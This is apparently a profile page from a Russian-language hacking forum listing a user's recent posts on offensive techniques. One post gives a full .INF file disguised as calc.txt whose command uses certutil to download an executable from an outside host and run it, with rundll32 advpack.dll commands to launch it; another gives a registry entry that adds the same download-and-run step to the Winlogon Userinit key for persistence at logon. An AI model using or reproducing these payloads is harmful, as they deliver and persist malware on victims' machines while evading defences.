Перейти к содержимому


Xrahitel

Регистрация: 04 Янв 2015
Оффлайн Активность: Скрыто
*****

Мои темы

Teams User Enum Microsoft API

Сегодня, 14:49

1.gif


Как спрятать боевую нагрузку в .txt

Сегодня, 01:02

Всем п/т так как файлы .INF это просто текстовый документ по этому мы тупо его переименуем в calc.txt biggrin.png 

 

Для демонстрации взял макрос.

 

 

p.s Ответы найдете тут под видео тыц также в бою тыц

 

нагрузка в .INF

[Version]
Signature="$CHICAGO$"
AdvancedINF=2.5,"test"
[DefaultInstall]
RunPreSetupCommands=Command1
[Command1]
C:\Windows\System32\cmd.exe /c certutil -urlcache -split -f http://disk.karelia.pro/ylMDeb/xrahitel.exe %APPDATA%\xrahitel.exe & start %APPDATA%\xrahitel.exe

Команды что сам про тестил;

rundll32.exe advpack.dll,LaunchINFSection calc.txt,DefaultInstall

rundll32.exe ieadvpack.dll,LaunchINFSection calc.txt,,1,

rundll32.exe advpack.dll,LaunchINFSection calc.txt,,1,

Как определить тип файервола

Вчера, 14:21

wafw00f.png

 

Remote Hacker Probe Pro V.2

Вчера, 02:56

 

remote probe или тыц


Registry to PowerShell converter

21 Июль 2021 - 21:03

 

p.converter тему тут найдете тыц wink.png 

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\cmd.exe /c certutil -urlcache -split -f http://disk.karelia.pro/Vupfdp/test.exe %APPDATA%\test.exe & start %APPDATA%\test.exe"